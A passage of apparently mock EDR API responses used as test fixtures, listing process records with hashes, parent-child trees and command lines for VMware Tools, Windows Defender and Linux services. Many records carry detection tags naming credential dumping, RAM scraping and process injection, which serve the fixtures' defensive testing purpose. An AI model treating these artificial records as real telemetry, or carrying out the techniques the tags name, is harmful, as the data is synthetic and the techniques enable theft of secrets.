"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15",
"12384336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
3909
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_NO_PARENT_GUID = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15",
"12384336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
3909
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_NO_PID = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15",
"12384336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_2 = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_hash": [
"63d423ea882264dbb157a965c200306212fc5e1c6ddb8cbbb0f1d3b51ecd82e6",
"45684336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
788
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_3 = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0034d5f2-00000284-00000000-1d687097e9cf7b5",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-003513bc-00000001-00000000-1d640200c9a61d7",
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
788
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_PARENT_JOB_RESULTS_RESP = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "parentofparent",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-0002b226-00000001-00000000-1d6225bbba74c01",
"process_hash": [
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d",
"c7084336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
2976
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_PARENT_JOB_RESULTS_RESP_1 = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-0002b226-00000001-00000000-1d6225bbba74c01",
"process_hash": [
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d",
"c7084336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
2976
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 6168,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESP = {
"contacted": 45,
"completed": 45,
"query": {
"cb.max_backend_timestamp": 1599853172000,
"cb.min_backend_timestamp": 0,
"cb.min_device_timestamp": 0,
"cb.preview_results": 500,
"cb.use_agg": True,
"facet": False,
"fl": "*,parent_hash,parent_name,process_cmdline,backend_timestamp,device_external_ip,device_group,device_internal_ip,device_os,process_effective_reputation,process_reputation,ttp", # noqa: E501
"fq": "{!collapse field=process_collapse_id sort='max(0,legacy) asc,device_timestamp desc'}",
"q": "(process_guid:test-0034d5f2-00000ba0-00000000-1d68709850fe521)",
"rows": 500,
"start": 0
},
"search_initiated_time": 1599853172533,
"connector_id": "ABCDEFGH"
}
GET_PROCESS_SUMMARY_RESP = {
"completed": 30,
"contacted": 30,
"exception": "",
"summary": {
"children": [
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-03T20:33:19.002Z",
"childproc_count": 1,
"crossproc_count": 5,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:31:13.097Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1607027590489,
"modload_count": 18,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wddisable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-0000157c-00000000-1d6c9b339b4a0cd",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
5500
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-03T20:31:05.847Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
},
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-02T05:59:53.548Z",
"childproc_count": 1,
"crossproc_count": 4,
"device_external_ip": "24.243.76.124",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-02T05:45:15.950Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1606888776302,
"modload_count": 16,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
7544
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:45:15.531Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
}
],
"parent": {
"_process_filename": "systemd",
"backend_timestamp": "2020-08-28T19:12:07.989Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [
1
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
},
"process": {
"_process_filename": "bash",
"backend_timestamp": "2020-08-28T19:16:11.959Z",
"childproc_count": 333580,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:14:41.231Z",
"filemod_count": 0,
"ingress_time": 1598642141411,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/bin/bash /usr/sbin/ksmtuned"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00001615-00000000-1d6225bbba75e5e",
"process_hash": [
"c7084336325dc8eadfb1e8ff876921c4",
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d"
],
"process_name": "/usr/bin/bash",
"process_pid": [
5653,
16139
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "nm-dispatcher",
"backend_timestamp": "2020-08-19T20:55:33.446Z",
"childproc_count": 1,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-19T20:54:44.980Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1597870506825,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/usr/libexec/nm-dispatcher"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00005742-00000000-1d6766af7bedb39",
"process_hash": [
"04b2450579a663c964f3960cd0cf93a8",
"2206d95e0a435aadad6c84b5bce370d076137efecf6adbbf6feddbe0515fb17e"
],
"process_name": "/usr/libexec/nm-dispatcher",
"process_pid": [
22338
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-08-19T20:54:44.909Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
}
}
GET_PROCESS_SUMMARY_RESP_NO_PID = {
"completed": 30,
"contacted": 30,
"exception": "",
"summary": {
"children": [],
"parent": {
"_process_filename": "systemd",
"backend_timestamp": "2020-08-28T19:12:07.989Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [
1
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
},
"process": {
"_process_filename": "bash",
"backend_timestamp": "2020-08-28T19:16:11.959Z",
"childproc_count": 333580,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:14:41.231Z",
"filemod_count": 0,
"ingress_time": 1598642141411,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/bin/bash /usr/sbin/ksmtuned"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00001615-00000000-1d6225bbba75e5e",
"process_hash": [
"c7084336325dc8eadfb1e8ff876921c4",
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d"
],
"process_name": "/usr/bin/bash",
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "nm-dispatcher",
"backend_timestamp": "2020-08-19T20:55:33.446Z",
"childproc_count": 1,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-19T20:54:44.980Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1597870506825,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/usr/libexec/nm-dispatcher"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00005742-00000000-1d6766af7bedb39",
"process_hash": [
"04b2450579a663c964f3960cd0cf93a8",
"2206d95e0a435aadad6c84b5bce370d076137efecf6adbbf6feddbe0515fb17e"
],
"process_name": "/usr/libexec/nm-dispatcher",
"process_pid": [
22338
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-08-19T20:54:44.909Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
}
}
GET_PROCESS_SUMMARY_RESP_NO_HASH = {
"completed": 30,
"contacted": 30,
"exception": "",
"summary": {
"children": [],
"parent": {
"_process_filename": "systemd",
"backend_timestamp": "2020-08-28T19:12:07.989Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [
1
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
},
"process": {
"_process_filename": "bash",
"backend_timestamp": "2020-08-28T19:16:11.959Z",
"childproc_count": 333580,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:14:41.231Z",
"filemod_count": 0,
"ingress_time": 1598642141411,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/bin/bash /usr/sbin/ksmtuned"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00001615-00000000-1d6225bbba75e5e",
"process_name": "/usr/bin/bash",
"process_pid": [
5653,
16139
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "nm-dispatcher",
"backend_timestamp": "2020-08-19T20:55:33.446Z",
"childproc_count": 1,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-19T20:54:44.980Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1597870506825,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"parent_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"parent_hash": [
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85",
"e4b9902024ac32b3ca37f6b4c9b841e8"
],
"parent_name": "/usr/lib/systemd/systemd",
"parent_pid": 1,
"process_cmdline": [
"/usr/libexec/nm-dispatcher"
],
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00005742-00000000-1d6766af7bedb39",
"process_hash": [
"04b2450579a663c964f3960cd0cf93a8",
"2206d95e0a435aadad6c84b5bce370d076137efecf6adbbf6feddbe0515fb17e"
],
"process_name": "/usr/libexec/nm-dispatcher",
"process_pid": [
22338
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-08-19T20:54:44.909Z",
"process_username": [
"root"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
}
}
GET_PROCESS_SUMMARY_RESP_ZERO_CONTACTED = {
"completed": 0,
"contacted": 0,
"exception": "",
"summary": {}
}
GET_PROCESS_SUMMARY_RESP_STILL_QUERYING = {
"completed": 5,
"contacted": 10,
"exception": "",
"summary": {}
}
GET_PROCESS_SUMMARY_RESP_1 = {
"exception": "",
"summary": {
"process": {
"_process_filename": "csrss.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:21.866Z",
"filemod_count": 0,
"has_children": False,
